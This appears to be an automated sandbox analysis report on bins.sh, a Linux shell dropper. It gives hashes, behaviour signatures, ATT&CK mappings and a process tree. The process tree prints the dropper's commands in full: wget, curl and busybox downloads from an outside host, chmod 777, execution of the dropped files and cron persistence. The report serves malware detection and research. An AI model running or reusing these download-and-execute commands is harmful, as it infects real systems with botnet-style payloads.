Analysis
- max time kernel: 150s
- max time network: 153s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 05/12/2024, 07:52
Static task
- static1
Behavioral tasks
- behavioral1: sample bins.sh, resource ubuntu1804-amd64-20240611-en
- behavioral2: sample bins.sh, resource debian9-armhf-20240611-en
- behavioral3: sample bins.sh, resource debian9-mipsbe-20240611-en
- behavioral4: sample bins.sh, resource debian9-mipsel-20240226-en
General
- Target: bins.sh
- Size: 10KB
- MD5: 4ec351f49dc5766e37b9f2ca107ea79f
- SHA1: 1e9e758cc6d6441d23748b0a346dcfc1df30e105
- SHA256: c4ffcebc0d441088029827d34c8dea73194328becf29e50825d908b5b2f5d661
- SHA512: 5371efb6490ae01946e723c37b09df490d54cc86f0b773d9b3121e608345aca8f92c18f149031f0380cca92eb021bf656abe984568c20fbe7a135211af49e60c
- SSDEEP: 192:8cfVNYb3Tjdl4z596v3m8MJeyct+8CB596v3w8MJeyhlI0VNYb3TS:8cydl1t+8ulIm
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTPs, 5 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid  Process
  718  chmod
  684  chmod
  700  chmod
  706  chmod
  712  chmod
- Executes dropped EXE (1 IoCs)
  ioc                                       pid  Process
  /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB   685  zZM090BtLw96clc18K3325Bi3InWJUorwB
- Renames itself (1 IoCs)
  pid  Process
  686  zZM090BtLw96clc18K3325Bi3InWJUorwB
- Creates/modifies Cron job (1 TTPs, 1 IoCs)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  description                    ioc                                    Process
  File opened for modification   /var/spool/cron/crontabs/tmp.nFADI4    crontab
- Enumerates running processes
  Discovers information about currently running processes on the system.
- Checks CPU configuration (1 TTPs, 1 IoCs)
  Checks CPU information, which can indicate whether the system is a virtual machine.
  description               ioc              Process
  File opened for reading   /proc/cpuinfo    curl
- Reads runtime system information
  description               ioc                              Process
  File opened for reading   /proc/self/auxv                  curl
  File opened for reading   /proc/sys/crypto/fips_enabled    curl
  File opened for reading   /proc/<pid>/cmdline              zZM090BtLw96clc18K3325Bi3InWJUorwB
  (the /proc/<pid>/cmdline reads cover pids 265, 692, 699, 716, 789, 824, 12, 27, 783, 835, 902, 17, 645, 702, 780, 25, 650, 844, 862, 863, 891, 710, 792, 867, 290, 451, 802, 871, 882, 1, 812, 872, 724, 786, 738, 781, 813, 877, 886, 887, 893, 731, 906, 720, 745, 330, 840, 744, 787, 810, 859, 402, 717, 14, 726, 260, 774, 861, 794, 836, 23 and 740, one entry each)
- System Network Configuration Discovery (1 TTPs, 16 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid  Process
  717  busybox
  698  curl
  709  wget
  699  busybox
  666  curl
  683  busybox
  710  curl
  715  wget
  716  curl
  697  wget
  703  wget
  705  busybox
  711  busybox
  722  wget
  660  wget
  704  curl
- Writes file to tmp directory (1 IoCs)
  Malware often drops required files in the /tmp directory.
  description                    ioc                                       Process
  File opened for modification   /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB   curl
Processes
- /tmp/bins.sh  [PID:652]
    cmd: /tmp/bins.sh
  - /bin/rm  [PID:654]
      cmd: /bin/rm bins.sh
  - /usr/bin/wget  [PID:660]
      cmd: wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB
      sig: System Network Configuration Discovery
  - /usr/bin/curl  [PID:666]
      cmd: curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB
      sig: Checks CPU configuration; Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - /bin/busybox  [PID:683]
      cmd: /bin/busybox wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB
      sig: System Network Configuration Discovery
  - /bin/chmod  [PID:684]
      cmd: chmod 777 zZM090BtLw96clc18K3325Bi3InWJUorwB
      sig: File and Directory Permissions Modification
  - /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB  [PID:685]
      cmd: ./zZM090BtLw96clc18K3325Bi3InWJUorwB
      sig: Executes dropped EXE; Renames itself; Reads runtime system information
    - /bin/sh  [PID:687]
        cmd: sh -c "crontab -l"
      - /usr/bin/crontab  [PID:689]
          cmd: crontab -l
    - /bin/sh  [PID:690]
        cmd: sh -c "crontab -"
      - /usr/bin/crontab  [PID:691]
          cmd: crontab -
          sig: Creates/modifies Cron job
  - /bin/rm  [PID:694]
      cmd: rm zZM090BtLw96clc18K3325Bi3InWJUorwB
  - /usr/bin/wget  [PID:697]
      cmd: wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG
      sig: System Network Configuration Discovery
  - /usr/bin/curl  [PID:698]
      cmd: curl -O http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG
      sig: System Network Configuration Discovery
  - /bin/busybox  [PID:699]
      cmd: /bin/busybox wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG
      sig: System Network Configuration Discovery
  - /bin/chmod  [PID:700]
      cmd: chmod 777 ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG
      sig: File and Directory Permissions Modification
  - /tmp/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG  [PID:701]
      cmd: ./ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG
  - /bin/rm  [PID:702]
      cmd: rm ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG
  - /usr/bin/wget  [PID:703]
      cmd: wget http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9
      sig: System Network Configuration Discovery
  - /usr/bin/curl  [PID:704]
      cmd: curl -O http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9
      sig: System Network Configuration Discovery
  - /bin/busybox  [PID:705]
      cmd: /bin/busybox wget http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9
      sig: System Network Configuration Discovery
  - /bin/chmod  [PID:706]
      cmd: chmod 777 OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9
      sig: File and Directory Permissions Modification
  - /tmp/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9  [PID:707]
      cmd: ./OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9
  - /bin/rm  [PID:708]
      cmd: rm OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9
  - /usr/bin/wget  [PID:709]
      cmd: wget http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX
      sig: System Network Configuration Discovery
  - /usr/bin/curl  [PID:710]
      cmd: curl -O http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX
      sig: System Network Configuration Discovery
  - /bin/busybox  [PID:711]
      cmd: /bin/busybox wget http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX
      sig: System Network Configuration Discovery
  - /bin/chmod  [PID:712]
      cmd: chmod 777 Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX
      sig: File and Directory Permissions Modification
  - /tmp/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX  [PID:713]
      cmd: ./Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX
  - /bin/rm  [PID:714]
      cmd: rm Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX
  - /usr/bin/wget  [PID:715]
      cmd: wget http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS
      sig: System Network Configuration Discovery
  - /usr/bin/curl  [PID:716]
      cmd: curl -O http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS
      sig: System Network Configuration Discovery
  - /bin/busybox  [PID:717]
      cmd: /bin/busybox wget http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS
      sig: System Network Configuration Discovery
  - /bin/chmod  [PID:718]
      cmd: chmod 777 Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS
      sig: File and Directory Permissions Modification
  - /tmp/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS  [PID:719]
      cmd: ./Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS
  - /bin/rm  [PID:720]
      cmd: rm Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS
  - /usr/bin/wget  [PID:722]
      cmd: wget http://conn.masjesu.zip/bins/jycs76M6vBIZ1GmDmLy0gXM9o11CS79Z9O
      sig: System Network Configuration Discovery
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- File and Directory Permissions Modification (1)
  - Linux and Mac File and Directory Permissions Modification (1)
- Virtualization/Sandbox Evasion (1)
  - System Checks (1)
Downloads
- Filesize: 177KB
  MD5: 786d75a158fe731feca3880f436082c0
  SHA1: 79ea2734e43d00cdeabed5586b2c1994d02aef3e
  SHA256: 5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
  SHA512: 7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
- Filesize: 210B
  MD5: 5e8eb0b39864e53b859bcdcaeb4dbe6a
  SHA1: c8116483ad132a21e500bb5087c53996ed66334c
  SHA256: 6f0768d965338cb7d3061fcc41810df84bd23d8978a6e186fe996b33e6ae37e7
  SHA512: 4338d28aba1567ee8022a74e0d80020daaeea88b4d026c36fbb9e395e7e9d4a511073e94a018afe1863248585fe7f413d09ccff177f6b41c24ff829d746a0820